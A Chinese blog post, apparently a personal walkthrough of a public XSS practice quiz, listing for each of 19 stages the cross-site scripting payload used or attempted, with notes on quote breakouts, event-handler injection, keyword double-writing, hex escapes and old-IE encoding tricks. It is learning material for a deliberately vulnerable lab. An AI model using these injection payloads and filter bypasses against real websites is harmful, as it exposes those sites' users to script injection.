xss challenge通关记录
- [Stage #1](http://xss-quiz.int21h.jp/?sid=2a75ff06e0147586b7ceb0fe68ee443b86a6e7b9)
- [Stage #2](http://xss-quiz.int21h.jp/stage2.php?sid=9532df794eb7055cab4e31fbac353c0df1960148)
- [Stage #3](http://xss-quiz.int21h.jp/stage-3.php?sid=5a47bf8bf0dd8ce20b80f1622b66b7b061b88c7a)
- [Stage #4](http://xss-quiz.int21h.jp/stage_4.php?sid=379f6925f33df5c6ad079263f65a97d8527fd6e3)
- [Stage #5](http://xss-quiz.int21h.jp/stage--5.php?sid=e65c978171f6ccab00dd94ae4d93428f566a88b3)
- [Stage #6](http://xss-quiz.int21h.jp/stage-no6.php?sid=fb52b1908dfa916733f61c08a2942e03f11b0894)
- [Stage #7](http://xss-quiz.int21h.jp/stage07.php?sid=2e71a47a9c7061dcce2b9205b52f4252bd53b443)
- [Stage #8](http://xss-quiz.int21h.jp/stage008.php?sid=9a2b87b21da3ee6de99244f62cae1f131d34761b)
- [Stage #9](http://xss-quiz.int21h.jp/stage_09.php?sid=1aa32193e5e2adf2cee55de0b03e2a01494b4ba3)
- [Stage #10](http://xss-quiz.int21h.jp/stage00010.php?sid=718360225fa9356a42c30995f38b5142c3496f6a)
- [Stage #11](http://xss-quiz.int21h.jp/stage11th.php?sid=bddea6ab0140e0b9ec340ea96a8c8cabe33d4704)
- [Stage #12](https://xss-quiz.int21h.jp/stage_no012.php?sid=4a799ae478f5a6f4c631c5c9bb9fe60e8fc9aeba)
- [Stage #13](https://xss-quiz.int21h.jp/stage13_0.php?sid=64e0a185ed0f0e06eb72fb63a38632f3f633bf7b)
- [Stage #14](https://xss-quiz.int21h.jp/stage-_-14.php?sid=b7d3de133f7fdf2e35947a1e9eb7c9c3df4d01aa)
- [Stage #15](https://xss-quiz.int21h.jp/stage__15.php?sid=f938ce81d41f0a72530f1190e9613b31bbd97b7c)
- [Stage #16](https://xss-quiz.int21h.jp/stage00000016.php?sid=f14b9ce30e14455e4de2a3d3daf95b9647a0610e)
- [Stage #17](https://xss-quiz.int21h.jp/stage-No17.php?sid=15bfed0dc66ae0bfd775d3c4428228e2c37b1c96)
- [Stage #18](https://xss-quiz.int21h.jp/stage__No18.php?sid=8c29e1375f872a08361f7863fce017205eff00bb)
- [Stage #19](https://xss-quiz.int21h.jp/stage_--19.php?sid=ffebd4d25fe5fcab78e99f71dea9268c5a482c9e)
Stage #1
//第一关没有任何过滤直接搞
<script>alert(document.domain);</script>
Stage #2
//需要闭合
"><script>alert(document.domain);</script>
Stage #3
抓包修改p2的值(选择国家那个地方
<script>alert(document.domain)</script>
Stage #4
发现有一个p3值是被隐藏了
"><script>alert(document.domain)</script><"
Stage #5
长度被限制了。。
修改这里👇之后再传入payload即可(记得闭合前边
Stage #6
>被过滤了
直接再value内利用onclick事件
"οnclick=alert(document.domain);name="/
Stage #7
与上一关相似.
" onclick=alert(document.domain)
//空格可以分割属性
Stage #8
这关是将输入的东西整到a标签中
javascript:alert(document.domain)
Stage #9
要用到utf-7编码。。。先略了
Stage #10
这关把domain过滤了,尝试一下双写
"><script>alert(document.domdomainain)</script>
Stage #11
不知道为啥打不开了。先略.
Stage #12
ie浏览器会把``(键盘左上横排数字的最左边用英文输入法)识别为双引号(<>被过滤就设置属性),构造payload。
``onclick=alert(document.domain) //但是并未成功
Stage #13
未过。。
Stage #14
background-color:salmon;input:e/**/xpression((window.x==1)?'':(window.x=1,alert(document.domain)))//dalao的payload
未成功 。。
Stage #15
进行16进制转换或者Unicode编码
\\x3cscript\\x3ealert(document.domain);\\x3c/script\\x3e
Stage #16
打不开。。
Stage #17
只能在老版ie上可以成功。。直接看dalao的wp吧
Stage #18
依旧老ie。。
%A2%BE%BCscript%BEalert(document.domain);%BC/script%BE//dalao的payload
Stage #19
在twitter上找 DomXss at Sep 24,2010 。。
扫一扫
8960
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
